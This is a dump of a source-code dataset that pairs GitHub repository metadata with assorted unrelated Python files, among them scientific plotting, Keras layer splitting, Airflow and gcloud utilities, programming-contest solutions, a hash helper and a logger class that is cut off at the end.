|
[
"MIT"
] |
permissive
|
tefra/xsdata-w3c-tests
|
397180205a735b06170aa188f1f39451d2089815
|
081d0908382a0e0b29c8ee9caca6f1c0e36dd6db
|
refs/heads/main
| 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 |
MIT
| 2023-07-25T14:19:04 | 2020-02-10T21:59:47 |
Python
|
UTF-8
|
Python
| false | false | 695 |
py
|
from output.models.nist_data.list_pkg.non_negative_integer.schema_instance.nistschema_sv_iv_list_non_negative_integer_enumeration_3_xsd.nistschema_sv_iv_list_non_negative_integer_enumeration_3 import NistschemaSvIvListNonNegativeIntegerEnumeration3
from output.models.nist_data.list_pkg.non_negative_integer.schema_instance.nistschema_sv_iv_list_non_negative_integer_enumeration_3_xsd.nistschema_sv_iv_list_non_negative_integer_enumeration_3 import NistschemaSvIvListNonNegativeIntegerEnumeration3Type
obj = NistschemaSvIvListNonNegativeIntegerEnumeration3(
value=NistschemaSvIvListNonNegativeIntegerEnumeration3Type.VALUE_693_7324_20_7475_4947489_80584759_9768357488_66469880_746558290
)
|
[
"[email protected]"
] | |
a99e5fd938668998f40d71595197fe4eabfea880
|
7cd36fa026bb922e438905819e97d7ed208dc49e
|
/examples/advanced/thinplate_morphing.py
|
d0515987197e12cfdcdd0e91e7e65d6ca9ab8b07
|
[
"MIT"
] |
permissive
|
lxychuanhai/vtkplotter
|
b267bfcbbee5c7733ac98f5327e311c9529c74b1
|
bc1b8b8821095263a46bba20ca345cab1d70cc42
|
refs/heads/master
| 2020-11-25T15:25:33.597049 | 2019-12-17T18:49:05 | 2019-12-17T18:49:05 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 808 |
py
|
"""
Warp the tip of a mesh using Thin Plate Splines.
Red points stay fixed while a single point in space
moves as the arrow shows.
"""
from vtkplotter import *
mesh = load(datadir+"man.vtk").normalize()
meshd = mesh.clone().decimate(N=100) # a heavily decimated copy
sources = [[0.0, 1.0, 0.2]] # this point moves
targets = [[0.3, 1.3, 0.4]] # to this.
for pt in meshd.getPoints():
if pt[1] < 0.3: # these pts don't move
sources.append(pt) # source = target
targets.append(pt)
# calculate the warping T on the reduced mesh
T = thinPlateSpline(meshd, sources, targets).getTransform()
warp = mesh.clone().transformMesh(T).c("blue").alpha(0.4)
apts = Points(sources).c("red")
arro = Arrow(sources[0], targets[0])
show(mesh, arro, warp, apts, Text(__doc__), viewup="z", axes=1)
|
[
"[email protected]"
] | |
1d94a7aaf0160f003ff3934bba18e8f21ae50052
|
69a576aa60918b3b846963da2238931468e354ab
|
/utils/spatial.py
|
48c11f134472aad99921594a9b5bfddc25d536b5
|
[] |
no_license
|
parallel-ml/stand-alone
|
3d04a31d442bf422d67d2f0a1f03eb04bdb841c7
|
c86ce0d632188e9e16fb5539a7e2baed2c40ecdb
|
refs/heads/master
| 2020-03-29T10:49:48.426742 | 2018-11-20T16:40:35 | 2018-11-20T16:40:35 | 149,824,728 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,044 |
py
|
"""
This module implements single Conv2D layer spatial split.
It provides an example of 2 division and another generalized
example. The arithmetic technique is discussed in 2 division
example.
"""
from keras.layers import Conv2D, Lambda, ZeroPadding2D
from keras.layers.merge import Concatenate
import keras.backend as K
import math
def split_xy(X, kernal, strides, padding, num):
""" A general function for split tensors with different shapes. """
# take care of padding here and set padding of conv always to be valid
if padding == 'same':
wk, hk = kernal
ws, hs = strides
_, W, H, _ = K.int_shape(X)
ow, oh = W / ws, H / hs
if W % ws != 0:
ow += 1
if H % hs != 0:
oh += 1
wp, hp = (ow - 1) * ws + wk - W, (oh - 1) * hs + hk - H
wp, hp = wp if wp >= 0 else 0, hp if hp >= 0 else 0
X = ZeroPadding2D(padding=((hp / 2, hp - hp / 2), (wp / 2, wp - wp / 2)))(X)
wk, hk = kernal
ws, hs = strides
_, W, H, _ = K.int_shape(X)
# output size
ow, oh = (W - wk) / ws + 1, (H - hk) / hs + 1
# calculate boundary for general chunk
wchunk, hchunk = ow / num, oh / num
rw, rh = (wchunk - 1) * ws + wk, (hchunk - 1) * hs + hk
# calculate special boundary for last chunk
wlchunk, hlchunk = ow - (num - 1) * wchunk, oh - (num - 1) * hchunk
lrw, lrh = (wlchunk - 1) * ws + wk, (hlchunk - 1) * hs + hk
offset = lambda kernals, strides, i: (kernals - strides) * i if kernals - strides > 0 else 0
# create a list of tuple with boundary (left, right, up, down)
boundary = []
for r in range(num):
for c in range(num):
if r == num - 1 and c == num - 1:
boundary.append((W - lrw, W, H - lrh, H))
elif r == num - 1:
boundary.append((rw * c - offset(wk, ws, c), rw * c - offset(wk, ws, c) + rw, H - lrh, H))
elif c == num - 1:
boundary.append((W - lrw, W, rh * r - offset(hk, hs, r), rh * r - offset(hk, hs, r) + rh))
else:
boundary.append(
(
rw * c - offset(wk, ws, c),
rw * c - offset(wk, ws, c) + rw,
rh * r - offset(hk, hs, r),
rh * r - offset(hk, hs, r) + rh,
)
)
return Lambda(
lambda x:
[x[:, lb:rb, ub:db, :] for lb, rb, ub, db in boundary]
)(X)
def merge(tensors):
"""
The merge function will concatenate all inputs vertically and
then horizontally.
"""
size = int(math.sqrt(len(tensors)))
rows = [Concatenate(axis=1)(tensors[k * size:k * size + size]) for k in range(size)]
return Concatenate(axis=2)(rows)
def conv(tensors, filters, kernal, strides, padding, activation, name):
layer = Conv2D(filters, kernal, strides=strides, padding=padding, activation=activation, name=name + '_conv')
return [layer(x) for x in tensors]
|
[
"[email protected]"
] | |
4fd1a36063610493d16705b91faca3442fdc810a
|
480e33f95eec2e471c563d4c0661784c92396368
|
/Geometry/HGCalCommonData/test/python/dumpTBGeometryDDD_cfg.py
|
998122a85ad6a346ff919cce319dcc301f314db8
|
[
"Apache-2.0"
] |
permissive
|
cms-nanoAOD/cmssw
|
4d836e5b76ae5075c232de5e062d286e2026e8bd
|
4eccb8a758b605875003124dd55ea58552b86af1
|
refs/heads/master-cmsswmaster
| 2021-01-23T21:19:52.295420 | 2020-08-27T08:01:20 | 2020-08-27T08:01:20 | 102,867,729 | 7 | 14 |
Apache-2.0
| 2022-05-23T07:58:09 | 2017-09-08T14:03:57 |
C++
|
UTF-8
|
Python
| false | false | 821 |
py
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("DUMP")
process.load("Geometry.HGCalCommonData.testTB181XML_cfi")
process.load('FWCore.MessageService.MessageLogger_cfi')
if 'MessageLogger' in process.__dict__:
process.MessageLogger.categories.append('G4cerr')
process.MessageLogger.categories.append('G4cout')
process.MessageLogger.categories.append('HGCalGeom')
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.add_(cms.ESProducer("TGeoMgrFromDdd",
verbose = cms.untracked.bool(False),
level = cms.untracked.int32(14)
))
process.dump = cms.EDAnalyzer("DumpSimGeometry",
outputFileName = cms.untracked.string('TBGeom.root'))
process.p = cms.Path(process.dump)
|
[
"[email protected]"
] | |
bce38b1477870007035b59a1dc2f07b2775b04fa
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_3/Himanshu.Mishra/problem.py
|
abd5a6a5b627365883042f53a6cc564bc5e737e7
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 |
Python
|
UTF-8
|
Python
| false | false | 1,389 |
py
|
def isprime(n):
if n == 2:
return True
if not n & 1:
return False
return pow(2, n-1, n) == 1
# def isprime(n):
# """Returns True if n is prime."""
# if n == 2:
# return True
# if n == 3:
# return True
# if n % 2 == 0:
# return False
# if n % 3 == 0:
# return False
# i = 5
# w = 2
# while i * i <= n:
# if n % i == 0:
# return False
# i += w
# w = 6 - w
# return True
def isDivisibleBy(num):
for i in range(2, num):
if num%i==0:
return i
def main():
data = []
print("Case #1:")
for i in range(35):
num = 2**i
# print(num, len(bin(num)[2:]), bin(num+1)[2:], bin(int(num*2-1))[2:])
data.append([num+1, int(num*2-1)])
N = 32
count = 0
startingNumber = data[N-1][0]
finalNumber = data[N-1][1]
for i in range(startingNumber, finalNumber+1, 2):
numstr = bin(i)[2:]
base = [int(numstr, 2), int(numstr, 3), int(numstr, 4), int(numstr, 5), int(numstr, 6), int(numstr, 7), int(numstr, 8), int(numstr, 9), int(numstr, 10)]
# print(base)
flag = 0
for j in base:
if not isprime(j):
flag = 1
else:
flag = 0
break
if flag == 1:
if count >= 700:
break
else:
count = count + 1
answer = str(base[10-2])
for k in base:
answer += " " + str(isDivisibleBy(k))
print(answer)
if __name__ == '__main__':
main()
|
[
"[[email protected]]"
] | |
59aec718fce53f6051be2ea2d5f6ec1380b3bfd2
|
c7027edceeae907ce7d21112336e84f101eeb89b
|
/airflow/providers/sqlite/hooks/sqlite.py
|
5a14249ca5902174edf5d6b29c533545cbd950d7
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
jao6693/airflow
|
0a8027ce33e20ee8f6032facb1b8ab453c2d20d4
|
269b608246b015c55e6cae4ed0f50b1e2bb0fa95
|
refs/heads/main
| 2023-01-30T18:53:23.431745 | 2022-11-05T14:59:27 | 2022-11-05T14:59:27 | 320,338,180 | 0 | 0 |
Apache-2.0
| 2020-12-10T17:08:36 | 2020-12-10T17:08:35 | null |
UTF-8
|
Python
| false | false | 1,618 |
py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sqlite3
from airflow.providers.common.sql.hooks.sql import DbApiHook
class SqliteHook(DbApiHook):
"""Interact with SQLite."""
conn_name_attr = 'sqlite_conn_id'
default_conn_name = 'sqlite_default'
conn_type = 'sqlite'
hook_name = 'Sqlite'
placeholder = '?'
def get_conn(self) -> sqlite3.dbapi2.Connection:
"""Returns a sqlite connection object"""
conn_id = getattr(self, self.conn_name_attr)
airflow_conn = self.get_connection(conn_id)
conn = sqlite3.connect(airflow_conn.host)
return conn
def get_uri(self) -> str:
"""Override DbApiHook get_uri method for get_sqlalchemy_engine()"""
conn_id = getattr(self, self.conn_name_attr)
airflow_conn = self.get_connection(conn_id)
return f"sqlite:///{airflow_conn.host}"
|
[
"[email protected]"
] | |
c643c289d6a7b2f99414e9f9a7bb4a558e5ac8c3
|
d79f3a31d173f18ec112c521acdcee8e8e73724d
|
/test5.py
|
7cd08b85a12191df9c24b5d26bcedcd5412f72de
|
[] |
no_license
|
k156/hello
|
3de815de569b38f8260e774e57b138f4da43f480
|
f5a7f386d3f78d15d7f166a95ad25724e168f472
|
refs/heads/master
| 2020-04-04T23:15:38.252126 | 2019-05-03T05:57:00 | 2019-05-03T05:57:00 | 156,352,395 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 589 |
py
|
from bs4 import BeautifulSoup
import requests
from time import sleep
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
}
url = "https://www.melon.com/chart/index.htm#params%5Bidx%5D=1/"
html = requests.get(url, headers = headers).text
soup = BeautifulSoup(html, 'html.parser')
trs = soup.select("tr#lst50")
for tr in trs:
tds = tr.select('td')
rank = tds[1].text
title = tds[4]
# singer =
# print(rank, title, type(title))
print(rank, title, type(title))
|
[
"[email protected]"
] | |
48ee6be5fa369aab7a24d7f1be33ef53dfa886a5
|
e452f89c51180487f2ed68c33ca2fed54e14a967
|
/1-Python-Programming-Basics (Sep 2020)/Course-Exercises-and-Exams/02_Conditional-Statements/01.Lab-01-Excellent-Result.py
|
4d9450ac08bdcaf06642e2351b5898ce2cc0b984
|
[
"MIT"
] |
permissive
|
karolinanikolova/SoftUni-Software-Engineering
|
c996f18eea9fb93164ab674614e90b357ef4858a
|
7891924956598b11a1e30e2c220457c85c40f064
|
refs/heads/main
| 2023-06-21T23:24:55.224528 | 2021-07-22T16:15:59 | 2021-07-22T16:15:59 | 367,432,464 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 436 |
py
|
# 1. Проверка за отлична оценка
# Първата задача от тази тема е да се напише конзолна програма, която чете оценка (реално число),
# въведена от потребителя и отпечатва "Excellent!", ако оценката е 5.50 или по-висока.
grade = float(input())
if grade >= 5.50:
print("Excellent!")
|
[
"[email protected]"
] | |
b9e01fd5c696231a6b883b2817e73b84b476dbaa
|
1646b3fe9000c3109695e99b4bb75679577906ff
|
/236.LowestCommonAncestorOfABinaryTree.py
|
78bdf6a542e4686bb190fc7b9d792fdb40e9fbeb
|
[] |
no_license
|
yao9208/lc
|
5ecf6720886beb951c9a70433f53a0ec0bcb74dc
|
024c1b5c98a9e85706e110fc2be8dcebf0f460c3
|
refs/heads/master
| 2020-04-03T20:55:40.199637 | 2017-02-10T08:30:46 | 2017-02-10T08:30:46 | 56,478,941 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 554 |
py
|
class Solution(object):
def lowestCommonAncestor(self, root, p, q):
"""
:type root: TreeNode
:type p: TreeNode
:type q: TreeNode
:rtype: TreeNode
"""
if not root:
return root
if root==p or root==q:
return root
left = self.lowestCommonAncestor(root.left, p, q)
right = self.lowestCommonAncestor(root.right, p, q)
if left:
if right:
return root
else:
return left
return right
|
[
"[email protected]"
] | |
1f2424d5b24baaab7fe1c1ce30f92fcfc2ec1dd1
|
7ea5517353f325fc0bcc0e552233b103335bc9ec
|
/QUANTAXIS/QAMarket/common.py
|
143b325f56b9ba86e312c9a8f7bbeee7f3dbd0fd
|
[
"MIT"
] |
permissive
|
lxqjswa/QUANTAXIS
|
304f20c3ba957d51664a8736faca6a777a658583
|
a5f89b28a75d1a5094630a4ed166f596840528b1
|
refs/heads/master
| 2020-03-28T08:45:47.064394 | 2018-09-08T07:15:26 | 2018-09-08T07:15:26 | 147,987,895 | 1 | 0 |
MIT
| 2018-09-09T02:52:34 | 2018-09-09T02:52:34 | null |
UTF-8
|
Python
| false | false | 5,031 |
py
|
# shipane
# "申报时间", "证券代码", "证券名称", "操作", "委托状态", "委托数量", "成交数量", "撤消数量", , "委托价格", "成交均价", "合同编号", "委托子业务", "约定号", "对方账户", "参考汇率", "结算币种", "交易币种", "证券中文名", "出错信息
from QUANTAXIS.QAUtil.QAParameter import ORDER_DIRECTION, TRADE_STATUS, ORDER_STATUS
cn_en_compare = {'明细': 'id',
'证券代码': 'code',
'市场代码': 'market_code',
'证券名称': 'name',
'股票余额': 'amount',
'可用余额': 'sell_available',
'冻结数量': 'frozen',
'买卖标志': 'towards',
'撤消数量': 'cancel_amount',
'撤单数量': 'cancel_amount',
'订单类型': 'order_type',
'操作': 'towards', # 这个是模拟交易的买卖标志
'委托价格': 'order_price',
'委托数量': 'order_amount',
'成交价格': 'trade_price',
'成交数量': 'trade_amount',
'状态说明': 'status',
'备注': 'status', # 这个是模拟交易的status
'场外撤单': 'cancel_outside',
'场内撤单': 'cancel_inside',
'未成交': 'pending',
'全部撤单': 'cancel_all',
'委托时间': 'order_time',
'合同编号': 'realorder_id', # 模拟交易的委托编号
'撤销数量': 'cancel_amount',
'委托编号': 'realorder_id',
'批次号': 'pc_id',
'盈亏': 'pnl',
"": 'None',
'成本金额': 'cost',
'盈亏估算': 'pnl_prob',
'成本价': 'hold_price',
'实现盈亏': 'pnl_money_already',
'盈亏比例(%)': 'pnl_ratio',
'市价': 'price',
'市值': 'market_value',
'交易市场': 'SSE',
'股东帐户': 'shareholders',
'实际数量': 'total_amount',
'可申赎数量': 'redemption_number',
'资讯': 'message',
'汇率': 'exchange_rate',
'沪港深港市场': 'hkmarket',
'成本价港币': 'hold_price_hk',
'买入成本价港币': 'buy_price_hk',
'买入在途数量': 'buy_onway',
'卖出在途数量': 'sell_onway',
'场内废单': 'failled',
'场外撤单': 'cancel_outside',
'场内撤单': 'cancel_inside',
'未成交': 'pending',
'已成交': 'finished',
'全部撤单': 'cancel_all',
'成交均价': 'trade_price', # 成交价
'成交金额': 'trade_money',
'成交编号': 'trade_id',
'委托状态': 'status',
'申报时间': 'order_time',
'委托日期': 'order_date',
'委托子业务': 'order_subjob',
'约定号': 'yd_id',
'对方账户': 'other_account',
'参考汇率': 'refer_exchange',
'结算币种': 'settlement_currency',
'交易币种': 'trade_currency',
'证券中文名': 'CNname',
'出错信息': 'error',
'成交时间': 'trade_time'}
trade_towards_cn_en = {
'买入': ORDER_DIRECTION.BUY,
'买': ORDER_DIRECTION.BUY,
'卖出': ORDER_DIRECTION.SELL,
'卖': ORDER_DIRECTION.SELL,
'申购': ORDER_DIRECTION.ASK,
'申': ORDER_DIRECTION.ASK,
'证券买入': ORDER_DIRECTION.BUY,
'证券卖出': ORDER_DIRECTION.SELL,
'派息': ORDER_DIRECTION.XDXR,
'': ORDER_DIRECTION.OTHER
}
order_status_cn_en = {
'已报': ORDER_STATUS.QUEUED, # 委托已经被交易端接受了
'未成交': ORDER_STATUS.QUEUED,
'已确认': ORDER_STATUS.QUEUED, # 新股申购已经被交易端接受
'场内废单': ORDER_STATUS.FAILED,
'废单': ORDER_STATUS.FAILED, # 委托不符合交易规则,被交易端拒绝了
'未报': ORDER_STATUS.FAILED, # 委托还没有被交易端接受
'场外废单': ORDER_STATUS.FAILED,
'已成交': ORDER_STATUS.SUCCESS_ALL,
'已成': ORDER_STATUS.SUCCESS_ALL,
'全部成交': ORDER_STATUS.SUCCESS_ALL,
'部成': ORDER_STATUS.SUCCESS_PART, # 委托已经成交了一部份
'已撤单': ORDER_STATUS.CANCEL_ALL,
'全部撤单': ORDER_STATUS.CANCEL_ALL,
'已撤': ORDER_STATUS.CANCEL_ALL,
'已报待撤': ORDER_STATUS.QUEUED, # 已经申报了撤单,交易端也已接受,但目前可能因为还没在交易时间段,所以还在等待撤消
'场内撤单': ORDER_STATUS.CANCEL_ALL,
}
|
[
"[email protected]"
] | |
e53c50114defbb9001385514940c7f56071976fb
|
20c20938e201a0834ccf8b5f2eb5d570d407ad15
|
/abc032/abc032_b/8108449.py
|
b7cc2e87327a45202a747c78434008246dab432c
|
[] |
no_license
|
kouhei-k/atcoder_submissions
|
8e1a1fb30c38e0d443b585a27c6d134bf1af610a
|
584b4fd842ccfabb16200998fe6652f018edbfc5
|
refs/heads/master
| 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 159 |
py
|
S=input()
k=int(input())
import collections
table=collections.defaultdict(int)
for i in range(len(S)-k+1):
table[S[i:k+i]]+=1
print(len(list(table.keys())))
|
[
"[email protected]"
] | |
a570f27a7c1170f47520d0fd62cc5ef08e71442c
|
255e19ddc1bcde0d3d4fe70e01cec9bb724979c9
|
/all-gists/833679/snippet.py
|
4ab198d900965b661dbb57b70023f8d4c2106db6
|
[
"MIT"
] |
permissive
|
gistable/gistable
|
26c1e909928ec463026811f69b61619b62f14721
|
665d39a2bd82543d5196555f0801ef8fd4a3ee48
|
refs/heads/master
| 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 |
Python
|
UTF-8
|
Python
| false | false | 2,067 |
py
|
#
# HashUtils - Simple functions derivated from standard Python hashlib.
#
__author__ = 'Mauro Baraldi ([email protected])'
__version__ = '0.0.2: February 17, 2011'
import re
import hashlib
from datetime import datetime
class Hash:
"""Common facilities using hashlib standard lib. Algotrithm used in all
methods: MD5
Returns of method is hashlib.md5(object_to_hash).hexdigest()
Example of use:
from hashutils import Hash
h = Hash()
>>> h.now_hash()
'b3036f7831dc1394f1dcb6b989561d79'
>>> h.today_hash()
'b3036f7831dc1394f1dcb6b989561d79'
>>> h.string_hash("My name is Earl.")
'ad05d8348194adf6d6190a2ae550e099'
>>> h.file_hash('/home/mauro/passwords.txt')
'404627e52574140007692512e3ce2fa9'
>>> h.file_hash('/home/mauro/passwords.txt', 1024)
'997dd0044bc676fdf3f9db0560e642d0'
>>> h.from_date_hash((2001, 3, 1, 12, 45), '%Y/%m/%d %H:%M')
'fc573499016722e5ff0747f2dc7f4971'
"""
def __init__(self):
pass
def today_hash(self):
""" Return hash form datetime.today() function in format %Y%m%d """
self.today = datetime.today().strftime('%Y%m%d')
return hashlib.md5(self.today).hexdigest()
def now_hash(self):
""" Return hash form datetime.today() function in format %Y%m%d%H%M%S """
self.today = datetime.today().strftime('%Y%m%d')
return hashlib.md5(self.today).hexdigest()
def from_date_hash(self, date, strfmt):
""" Return hash form date in datetime.date format (%Y%m%d) """
self.format = re.compile('[a-zA-z]').sub('d', strfmt)
self.build_date = datetime.strptime(self.format % date, strfmt)
self.date = self.build_date.strftime(strfmt)
return hashlib.md5(self.date).hexdigest()
def string_hash(self, string):
""" Return hash form a given string. """
return hashlib.md5(string).hexdigest()
def file_hash(self, fp, size=128):
""" Return hash form a given file. Default first 128 bytes."""
with open(fp, 'r+') as temp:
return hashlib.md5(temp.read(size)).digest()
|
[
"[email protected]"
] | |
a5ba5bef1c1edc9aa06f3fe87232501307f1a1b2
|
c61c9bedba1968bfaf571ac3996b696fc35890a6
|
/Chapter16/16-3.py
|
ce29436d126c588d3560f122a3141296ca60d21e
|
[] |
no_license
|
ArunRamachandran/ThinkPython-Solutions
|
497b3dbdeba1c64924fe1d9aa24204a9ca552c5b
|
1a0872efd169e5d39b25134960168e3f09ffdc99
|
refs/heads/master
| 2020-04-01T10:23:20.255132 | 2014-11-07T17:04:52 | 2014-11-07T17:04:52 | 25,806,318 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 652 |
py
|
class Time(object):
''' to represent the time of a day '''
t1 = Time()
t2 = Time()
t1.h = 4
t1.m = 185
t1.s = 0
t2.h = 1
t2.m = 56
t2.s = 0
def add_time(t1,t2):
sum_time = Time()
sum_time.h = t1.h + t2.h
sum_time.m = t1.m + t2.m
sum_time.s = t1.s + t2.s
if sum_time.s > 60:
val = sum_time.s / 60
sum_time.s -= (60 * val)
sum_time.m += val
if sum_time.m > 60:
val_1 = sum_time.m / 60
sum_time.m -= (60 * val_1)
sum_time.h += val_1
print '%.2d:%.2d:%.2d' % (sum_time.h,sum_time.m,sum_time.s)
print "t1 ",
print '%.2d:%.2d:%.2d' % (t1.h, t1.m, t1.s)
print "t2 ",
print '%.2d:%.2d:%.2d' % (t2.h, t2.m, t2.s)
add_time(t1,t2)
|
[
"[email protected]"
] | |
5e875e702c4451a5fc79d1144425698fbc263c61
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_twining.py
|
87ddda74e438d11af092105cfd9569d7a62ef7c6
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 238 |
py
|
from xai.brain.wordbase.adjectives._twin import _TWIN
#calss header
class _TWINING(_TWIN, ):
def __init__(self,):
_TWIN.__init__(self)
self.name = "TWINING"
self.specie = 'adjectives'
self.basic = "twin"
self.jsondata = {}
|
[
"[email protected]"
] | |
e354add3beb18f533d7157be7068cbf4b7dd45db
|
0b5b699459252996f058c8303a1f7093e7951ba0
|
/food_delivery_app/restaurants/filters.py
|
1c91e8a329ec67287390dbb43fe190d8aa8fe536
|
[
"MIT"
] |
permissive
|
MahmoudFarid/Food-Delivery-App
|
f145293548949618ae47d81f4ee7c35629fdaf5c
|
8411ca48497e7347fe0258b720c2d2a566bb6e88
|
refs/heads/master
| 2020-04-12T04:40:22.129486 | 2018-12-23T21:52:09 | 2018-12-23T21:52:09 | 162,302,419 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 198 |
py
|
from django_filters import rest_framework as filters
from .models import Order
class OrderFilter(filters.FilterSet):
class Meta:
model = Order
fields = ['customer', 'status']
|
[
"[email protected]"
] | |
0964ca87b1476b689cf1f886a4e21864d6b7bb07
|
d488f052805a87b5c4b124ca93494bc9b78620f7
|
/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/command_lib/functions/deploy/labels_util.py
|
5e9da496f8ef33a5e94a3f93ad396421b5bf7ef7
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
PacktPublishing/DevOps-Fundamentals
|
5ce1fc938db66b420691aa8106ecfb3f9ceb1ace
|
60597e831e08325c7e51e8557591917f7c417275
|
refs/heads/master
| 2023-02-02T04:48:15.346907 | 2023-01-30T08:33:35 | 2023-01-30T08:33:35 | 131,293,311 | 13 | 19 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,718 |
py
|
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""'functions deploy' utilities for labels."""
from googlecloudsdk.api_lib.functions import util as api_util
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.command_lib.util.args import labels_util as args_labels_util
NO_LABELS_STARTING_WITH_DEPLOY_MESSAGE = (
'Label keys starting with `deployment` are reserved for use by deployment '
'tools and cannot be specified manually.')
def CheckNoDeploymentLabels(flag_name, label_names):
"""Check for labels that start with `deployment`, which is not allowed.
Args:
flag_name: The name of the flag to include in case of an exception
label_names: A list of label names to check
Raises:
calliope_exceptions.InvalidArgumentException
"""
if not label_names:
return
for label_name in label_names:
if label_name.startswith('deployment'):
raise calliope_exceptions.InvalidArgumentException(
flag_name, NO_LABELS_STARTING_WITH_DEPLOY_MESSAGE)
def SetFunctionLabels(function, update_labels, remove_labels, clear_labels):
"""Set the labels on a function based on args.
Args:
function: the function to set the labels on
update_labels: a dict of <label-name>-<label-value> pairs for the labels to
be updated, from --update-labels
remove_labels: a list of the labels to be removed, from --remove-labels
clear_labels: a bool representing whether or not to clear all labels,
from --clear-labels
Returns:
A bool indicating whether or not any labels were updated on the function.
"""
labels_to_update = update_labels or {}
labels_to_update['deployment-tool'] = 'cli-gcloud'
labels_diff = args_labels_util.Diff(additions=labels_to_update,
subtractions=remove_labels,
clear=clear_labels)
messages = api_util.GetApiMessagesModule()
labels_update = labels_diff.Apply(messages.CloudFunction.LabelsValue,
function.labels)
if labels_update.needs_update:
function.labels = labels_update.labels
return True
return False
|
[
"[email protected]"
] | |
4374e0f6d09d3fac569ee903abba1a0b69fc1c4a
|
da7740e0d20dc7dd9775d4a53da7c0f7779834e1
|
/MultiPlanarUNet/logging/logger.py
|
4147e6a51aeb3f3ead32053006a4c39614f4c56e
|
[
"MIT"
] |
permissive
|
xiaochengcike/MultiPlanarUNet
|
ca8fa35a8372b8d107bb16b29018e2413c108075
|
99c73ba2936b63282338cf31fe27086d414d2e62
|
refs/heads/master
| 2020-04-18T19:25:51.699311 | 2019-01-10T09:39:59 | 2019-01-10T09:39:59 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,492 |
py
|
import os
import inspect
from MultiPlanarUNet.utils.decorators import accepts
class Logger(object):
def __init__(self, base_path, print_to_screen=True, active_file=None,
overwrite_existing=False, print_calling_method=True):
self.base_path = os.path.abspath(base_path)
self.path = os.path.join(self.base_path, "logs")
self.overwrite_existing = overwrite_existing
# Get built in print function
# (if overwritten globally, Logger still maintains a reference to the
# true print function)
self.print_f = __builtins__["print"]
if not os.path.exists(self.path):
os.mkdir(self.path)
# Print options
self.separator = "-" * 80
self.print_to_screen = print_to_screen
self.print_calling_method = print_calling_method
# Set paths to log files
self.log_files = {}
self.currently_logging = {}
self.active_log_file = active_file or "log"
def __repr__(self):
return "<MultiPlanarUNet.logging.Logger object>"
def __str__(self):
return "Logger(base_path=%s, print_to_screen=%s, " \
"overwrite_existing=%s)" % (self.base_path,
self.print_to_screen,
self.overwrite_existing)
def new_log_file(self, filename):
file_path = os.path.join(self.path, "%s.txt" % filename)
if os.path.exists(file_path):
if self.overwrite_existing:
os.remove(file_path)
else:
raise OSError("Logging path: %s already exists. "
"Initialize Logger(overwrite_existing=True) "
"to overwrite." % file_path)
self.log_files[filename] = file_path
self.currently_logging[filename] = None
self.active_log_file = filename
# Add reference to model folder in log
ref = "Log for model in: %s" % self.base_path
self._add_to_log(ref, no_print=True)
@property
def print_to_screen(self):
return self._print_to_screen
@print_to_screen.setter
@accepts(bool)
def print_to_screen(self, value):
self._print_to_screen = value
@property
def print_calling_method(self):
return self._print_calling_method
@print_calling_method.setter
@accepts(bool)
def print_calling_method(self, value):
self._print_calling_method = value
@property
def log(self):
